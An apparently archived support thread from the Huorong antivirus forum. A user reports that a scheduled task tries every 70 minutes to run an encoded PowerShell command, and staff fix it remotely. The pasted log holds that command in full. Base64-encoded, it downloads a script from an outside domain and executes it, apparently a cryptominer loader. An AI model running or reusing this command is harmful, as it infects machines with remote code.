火绒安全软件

标题: 每隔70分钟就弹出利用PowerShell执行可疑脚本… [打印本页]

作者: 棠伯 时间: 2020-3-31 19:30
标题: 每隔70分钟就弹出利用PowerShell执行可疑脚本…

【1】2020-03-31 18:50:06,系统防护,系统加固,svchost.exe触犯敏感动作防护规则, 结束进程
操作进程：C:\Windows\system32\svchost.exe
命令行：C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
父进程：C:\Windows\system32\services.exe
防护项目：利用PowerShell执行可疑脚本
执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell.exe -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGEAZABkAHIAZQBzAHMAbgBlAHQALgBkAG8ALgBhAG0ALwBlAGMALgB0AHgAdAAnACkAKQA=
操作结果：结束进程

复制代码

就是这个，从开机开始，每隔70分钟就执行一次，虽然被拦下来了但是全盘扫描查不出来…进入安全模式全盘扫描了一遍也查不出来，而且百度了一下那个命令行结果全是挖矿木马人都傻了…
虽然现在没啥影响，但是每70分钟就跳出来一次心里总归不舒服，百度了一大堆看都看不懂，自己就不是那块料…
有别的解决办法吗…真不想重装系统啊…

作者: 虚妄的妄语 时间: 2020-3-31 20:57
= =等明天官方远程看看吧

作者: Nobuchika 时间: 2020-3-31 21:17
保留現場，明天上班時間會有官方跟進查看的

作者: 棠伯 时间: 2020-3-31 21:57

Nobuchika 发表于 2020-3-31 21:17
保留現場，明天上班時間會有官方跟進查看的

因为网课的关系要用到电脑…应该没问题吧…

作者: 火绒运营专员 时间: 2020-4-1 10:12
您好，麻烦您添加QQ：2208613431，我们远程看下问题，感谢您的反馈！

作者: 棠伯 时间: 2020-4-1 10:40

火绒运营专员发表于 2020-4-1 10:12
您好，麻烦您添加QQ：2208613431，我们远程看下问题，感谢您的反馈！

刚加上

作者: 火绒运营专员 时间: 2020-4-1 10:42

棠伯发表于 2020-4-1 10:40
刚加上

好的，通过QQ和您沟通！

作者: 火绒运营专员 时间: 2020-4-1 13:47
您好，您的问题已经通过远程解决，感谢您的反馈！

欢迎光临火绒安全软件 (https://bbs.huorong.cn/)